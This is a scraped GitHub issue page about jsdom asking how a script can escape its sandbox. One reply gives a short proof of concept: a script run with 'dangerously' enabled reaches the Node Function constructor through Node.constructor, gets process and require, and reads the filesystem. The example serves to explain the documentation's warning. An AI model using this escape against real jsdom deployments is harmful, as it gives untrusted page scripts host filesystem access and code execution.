Jsdom: How can a script escape the sandbox?

Created on 30 Nov 2019  路  1Comment  路  Source: jsdom/jsdom

The documentation states:

The jsdom sandbox is not foolproof, and code running inside the DOM's

>All comments

Here is a small example by extracting the Function from the Node.js environment.

const { JSDOM } = require("jsdom");

new JSDOM(`
<body>
  <script>
    const outerRealmFunctionConstructor = Node.constructor;
    const process = new outerRealmFunctionConstructor("return process")();
    const require = process.mainModule.require;

    // Game over!
    const fs = require('fs');
    console.log(fs.readdirSync('.'));
  </script>
</body>
`, { 
  runScripts: "dangerously" 
});
pmdartus picture pmdartus on 30 Nov 2019
👍3
Was this page helpful?
0 / 5 - 0 ratings

Related issues

JacksonGariety picture JacksonGariety  路  4Comments
cg433n picture cg433n  路  3Comments
jhegedus42 picture jhegedus42  路  4Comments
camelaissani picture camelaissani  路  4Comments
mitar picture mitar  路  4Comments